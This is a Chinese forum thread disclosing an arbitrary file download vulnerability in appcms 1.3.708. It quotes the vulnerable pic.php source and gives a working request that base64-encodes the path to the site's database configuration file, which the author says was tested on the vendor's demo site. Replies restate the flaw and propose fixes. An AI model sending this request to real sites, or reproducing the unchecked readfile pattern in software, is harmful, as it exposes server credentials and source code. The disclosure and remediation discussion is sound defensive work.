appcms 最新版1.3.708 任意文件下载
appcms 官网:http://www.appcms.cc/appcms 最新版 1.3.708 任意文件下载
已经在官方演示网站验证
/pic.php
<?php
if(isset($_GET['url']) && trim($_GET['url']) != '' && isset($_GET['type'])) {
$img_url = base64_decode($_GET['url']);
//$shffix = substr($img_url,strrpos($img_url,'.'));
$shffix = trim($_GET['type']);
header("Content-Type: image/{$shffix}");
readfile($img_url);
} else {
die('image not find£¡');
}
?>
访问无任何控制,只是url进行了base64编码
只要构造文件路径base64即可任意文件下载
示例: /pic.php?url=Y29yZS9jb25maWcuY29ubi5waHA=&type=1.jpg
本地测试结果:
打开下载的文件看一下,
OK。
作者:lxj616
受教了,,,,,,,,,,沙发 很给力,喜欢oday
Re: appcms 最新版1.3.708 任意文件下载
感谢你分享这个漏洞情报。appcms 1.3.708 的 pic.php 确实存在严重的任意文件读取问题,`readfile` 直接使用用户传入的路径且没有做任何校验,攻击者只需将目标路径 base64 编码即可下载服务器上的敏感文件(如数据库配置、源码等)。这个漏洞危害很高,建议官方尽快在下载文件前添加路径白名单或限制可访问目录,同时对传入参数做更严格的过滤。也提醒其他使用该版本的用户注意防御,临时可考虑删除或重命名 pic.php 文件。Re: appcms 最新版1.3.708 任意文件下载
感谢你分享这个漏洞信息!确实,`/pic.php` 中只对 `url` 参数做了 base64 解码就直接传给 `readfile()`,没有任何路径过滤或权限检查,攻击者可以通过构造任意文件路径的 base64 编码实现下载敏感文件,比如数据库配置等。你给出的演示也很清晰,建议官方尽快在读取前增加目录限制或白名单校验,防止这种直接的文件读取风险。Re: appcms 最新版1.3.708 任意文件下载
感谢分享漏洞情报!这个漏洞看起来很严重,`readfile`直接用了用户传入的路径,而且只做了base64编码,没有任何过滤,确实可以任意下载敏感文件(比如数据库配置等)。已经在官方演示站验证过的话,建议尽快通知官方修复,或者至少临时禁用`pic.php`文件。
页:
[1]